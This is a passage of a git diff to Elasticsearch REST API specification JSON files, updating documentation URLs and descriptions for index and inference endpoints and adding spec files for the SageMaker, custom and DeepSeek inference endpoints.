+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-data-lifecycle", + "description":"Update data stream lifecycles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json index 45c51cdec6282..7fb4a354bc0cc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_options.json @@ -1,8 +1,8 @@ { "indices.put_data_stream_options":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Updates the data stream options of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-data-stream-options", + "description":"Update data stream options" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json index b358c2d3c864f..290c897fc3a6b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_stream_settings.json @@ -1,8 +1,8 @@ { "indices.put_data_stream_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Updates a data stream's settings" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-data-stream-settings", + "description":"Update data stream settings" }, "stability":"stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json index 00f6ac88eab45..bdac7e8d51cec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_index_template.json @@ -1,8 +1,8 @@ { "indices.put_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-put-template.html", - "description":"Creates or updates an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-index-template", + "description":"Create or update an index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json index 266a926f8f49c..64743085050bf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_mapping.json @@ -1,8 +1,8 @@ { "indices.put_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-put-mapping.html", - "description":"Updates the index mappings." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping", + "description":"Update field mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json index 08134e211a312..f2760363c71b8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_settings.json @@ -1,8 +1,8 @@ { "indices.put_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-update-settings.html", - "description":"Updates the index settings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-settings", + "description":"Update index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json index 492a47c19a19b..8036417531c18 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_template.json @@ -1,8 +1,8 @@ { "indices.put_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates-v1.html", - "description":"Creates or updates an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-template", + "description":"Create or update a legacy index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json index b1174b89df0bd..2aeeaba0ef924 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.recovery.json @@ -1,8 +1,8 @@ { "indices.recovery":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-recovery.html", - "description":"Returns information about ongoing index shard recoveries." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-recovery", + "description":"Get index recovery information" }, "stability":"stable", "visibility":"public", @@ -41,6 +41,28 @@ "type":"boolean", "description":"Display only those recoveries that are currently on-going", "default":false + }, + "ignore_unavailable":{ + "type":"boolean", + "description":"Whether specified concrete indices should be ignored when unavailable (missing or closed)", + "default":false + }, + "allow_no_indices":{ + "type":"boolean", + "description":"Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)", + "default":true + }, + "expand_wildcards":{ + "type":"enum", + "options":[ + "open", + "closed", + "hidden", + "none", + "all" + ], + "default":"open", + "description":"Whether to expand wildcard expression to concrete indices that are open, closed or both." 
} } } diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json index 0932d77e93401..424e40c813e54 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.refresh.json @@ -1,8 +1,8 @@ { "indices.refresh":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-refresh.html", - "description":"Performs the refresh operation in one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-refresh", + "description":"Refresh an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json index c158e524683fe..d8872c9c8292e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.reload_search_analyzers.json @@ -1,8 +1,8 @@ { "indices.reload_search_analyzers":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-reload-analyzers.html", - "description":"Reloads an index's search analyzers and their resources." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-reload-search-analyzers", + "description":"Reload search analyzers" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json index da5f9237422e4..1eeda64556da4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.remove_block.json @@ -1,8 +1,8 @@ { "indices.remove_block": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html", - "description": "Removes a block from an index." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-remove-block", + "description": "Remove an index block" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json index c41233664de0e..c848bba18cb42 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_cluster.json @@ -1,8 +1,8 @@ { "indices.resolve_cluster": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-cluster-api.html", - "description": "Resolves the specified index expressions to return information about each cluster. If no index expression is provided, this endpoint will return information about all the remote clusters that are configured on the local cluster." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-resolve-cluster", + "description": "Resolve the cluster" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json index e27e3a0450bff..770aa8c5ec595 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.resolve_index.json @@ -1,8 +1,8 @@ { "indices.resolve_index":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-index-api.html", - "description":"Returns information about any matching indices, aliases, and data streams" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-resolve-index", + "description":"Resolve indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json index 47a1bee665506..bcb405a1dc10b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.rollover.json @@ -1,8 +1,8 @@ { "indices.rollover":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-rollover-index.html", - "description":"Updates an alias to point to a new index when the existing index\nis considered to be too large or too old." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-rollover", + "description":"Roll over to a new index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json index 5e75caaae4bc6..6b8695a4e6a9d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.segments.json @@ -1,8 +1,8 @@ { "indices.segments":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-segments.html", - "description":"Provides low-level information about segments in a Lucene index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-segments", + "description":"Get index segments" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json index 739107dc68681..0d8708aebfa7e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shard_stores.json @@ -1,8 +1,8 @@ { "indices.shard_stores":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shards-stores.html", - "description":"Provides store information for shard copies of indices." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shard-stores", + "description":"Get index shard stores" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json index cc9bc7c1e2de3..d28ca655afbdc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.shrink.json @@ -1,8 +1,8 @@ { "indices.shrink":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shrink-index.html", - "description":"Allow to shrink an existing index into a new index with fewer primary shards." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shrink", + "description":"Shrink an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json index e12b5116ffcdf..57c23ef9fbb1c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_index_template.json @@ -1,8 +1,8 @@ { "indices.simulate_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-simulate-index.html", - "description": "Simulate matching the given index name against the index templates in the system" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-index-template", + "description": "Simulate an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json index 7958454564c83..3b805ec0ba0d0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.simulate_template.json @@ -1,8 +1,8 @@ { "indices.simulate_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-simulate-template.html", - "description": "Simulate resolving the given template name or body" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-template", + "description": "Simulate an index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json index ed623fd130cc6..8b2169e0014c3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.split.json @@ -1,8 +1,8 @@ { "indices.split":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-split-index.html", - "description":"Allows you to split an existing index into a new index with more primary shards." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-split", + "description":"Split an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json index faafdfcdb588a..53fd94c15554a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.stats.json @@ -1,8 +1,8 @@ { "indices.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-stats.html", - "description":"Provides statistics on operations happening in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-stats", + "description":"Get index statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json index 76b33ad11d961..d6a5b62fafc2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.update_aliases.json @@ -1,8 +1,8 @@ { "indices.update_aliases":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Updates index aliases." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-update-aliases", + "description":"Create or update an alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json index 44fbfa18a2261..13cd9527a15fa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.validate_query.json @@ -1,8 +1,8 @@ { "indices.validate_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-validate.html", - "description":"Allows a user to validate a potentially expensive query without executing it." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-validate-query", + "description":"Validate a query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json index 98854625d0471..16f3afcccf2ed 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.chat_completion_unified.json @@ -1,7 +1,7 @@ { "inference.chat_completion_unified": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/chat-completion-inference.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-unified-inference", "description": "Perform chat completion inference" }, "stability": "stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json index 6c753e59e3434..9ac696d279de7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.completion.json @@ -1,8 +1,8 @@ { "inference.completion": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform completion inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform completion inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json index cb4eee007a246..1ffe8d1e3e664 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.delete.json @@ -1,7 +1,7 @@ { "inference.delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-inference-api.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-delete", "description": "Delete an inference endpoint" }, "stability": "stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json index 8887d9d0a1ebe..8612869a2b7f0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json @@ -1,7 +1,7 @@ { "inference.get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-inference-api.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-get", "description": "Get an inference endpoint" }, "stability": "stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json index bf1282dfaaef7..1ada118f0edd8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json @@ -1,8 +1,8 @@ { 
"inference.inference": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json index 4879007724450..7b67b74bed9fc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json @@ -1,8 +1,8 @@ { "inference.put": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-inference-api.html", - "description": "Configure an inference endpoint for use in the Inference API" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put", + "description": "Create an inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json index b39d5abe97ca2..2640f47b3c94d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json @@ -1,8 +1,8 @@ { "inference.put_alibabacloud": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-alibabacloud-ai-search.html", - "description": "Configure an AlibabaCloud AI Search inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-alibabacloud", + "description": "Create an AlibabaCloud AI Search inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json index 266a1800a360e..c313ccba1e1e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json @@ -1,8 +1,8 @@ { "inference.put_amazonbedrock": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-amazon-bedrock.html", - "description": "Configure an Amazon Bedrock inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-amazonbedrock", + "description": "Create an Amazon Bedrock inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonsagemaker.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonsagemaker.json new file mode 100644 index 0000000000000..415c230f3eb9d --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonsagemaker.json @@ -0,0 +1,35 @@ +{ + "inference.put_amazonsagemaker": { + "documentation": { + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-amazonsagemaker", + "description": "Create an Amazon SageMaker inference endpoint" + }, + "stability": 
"stable", + "visibility": "public", + "headers": { + "accept": ["application/json"], + "content_type": ["application/json"] + }, + "url": { + "paths": [ + { + "path": "/_inference/{task_type}/{amazonsagemaker_inference_id}", + "methods": ["PUT"], + "parts": { + "task_type": { + "type": "string", + "description": "The task type" + }, + "amazonsagemaker_inference_id": { + "type": "string", + "description": "The inference Id" + } + } + } + ] + }, + "body": { + "description": "The inference endpoint's task and service settings" + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json index dce56157c7d0e..6f022c9489c33 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json @@ -1,8 +1,8 @@ { "inference.put_anthropic": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-anthropic.html", - "description": "Configure an Anthropic inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-anthropic", + "description": "Create an Anthropic inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json index 00de83eca7ce2..e0b2ebb49638a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json @@ -1,8 +1,8 @@ { "inference.put_azureaistudio": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-azure-ai-studio.html", - "description": "Configure an Azure AI Studio inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-azureaistudio", + "description": "Create an Azure AI studio inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json index 8739adb1f5fd1..c2d02e513ce42 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json @@ -1,8 +1,8 @@ { "inference.put_azureopenai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-azure-openai.html", - "description": "Configure an Azure OpenAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-azureopenai", + "description": "Create an Azure OpenAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json index a00518f2c5c9e..153bf2b787920 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json @@ -1,8 +1,8 @@ { "inference.put_cohere": { "documentation": { - 
"url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-cohere.html", - "description": "Configure a Cohere inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-cohere", + "description": "Create a Cohere inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_custom.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_custom.json new file mode 100644 index 0000000000000..d14089cf12217 --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_custom.json @@ -0,0 +1,35 @@ +{ + "inference.put_custom": { + "documentation": { + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-custom", + "description": "Create a custom inference endpoint" + }, + "stability": "stable", + "visibility": "public", + "headers": { + "accept": ["application/json"], + "content_type": ["application/json"] + }, + "url": { + "paths": [ + { + "path": "/_inference/{task_type}/{custom_inference_id}", + "methods": ["PUT"], + "parts": { + "task_type": { + "type": "string", + "description": "The task type" + }, + "custom_inference_id": { + "type": "string", + "description": "The inference Id" + } + } + } + ] + }, + "body": { + "description": "The inference endpoint's task and service settings" + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_deepseek.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_deepseek.json new file mode 100644 index 0000000000000..96da2c931231e --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_deepseek.json @@ -0,0 +1,35 @@ +{ + "inference.put_deepseek": { + "documentation": { + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-deepseek", + "description": "Create a DeepSeek inference endpoint" + }, + "stability": "stable", + "visibility": "public", + "headers": { + "accept": ["application/json"], + "content_type": ["application/json"] + }, + "url": { + "paths": [ + { + "path": "/_inference/{task_type}/{deepseek_inference_id}", + "methods": ["PUT"], + "parts": { + "task_type": { + "type": "string", + "description": "The task type" + }, + "deepseek_inference_id": { + "type": "string", + "description": "The inference Id" + } + } + } + ] + }, + "body": { + "description": "The inference endpoint's task and service settings" + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json index 0c326b79e93b8..adae4e68838b8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json @@ -1,8 +1,8 @@ { "inference.put_elasticsearch": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elasticsearch.html", - "description": "Configure an Elasticsearch inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-elasticsearch", + "description": "Create an Elasticsearch inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json 
b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json index e601e6c8c3bca..fdee3cf2732bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json @@ -5,8 +5,8 @@ "description" : "The elser service is deprecated. Use the Elasticsearch inference integration instead, with model_id included in the service_settings." }, "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elser.html", - "description": "Configure an ELSER inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-elser", + "description": "Create an ELSER inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json index 4574626b61c00..dce5d98c169e7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json @@ -1,8 +1,8 @@ { "inference.put_googleaistudio": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-google-ai-studio.html", - "description": "Configure a Google AI Studio inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-googleaistudio", + 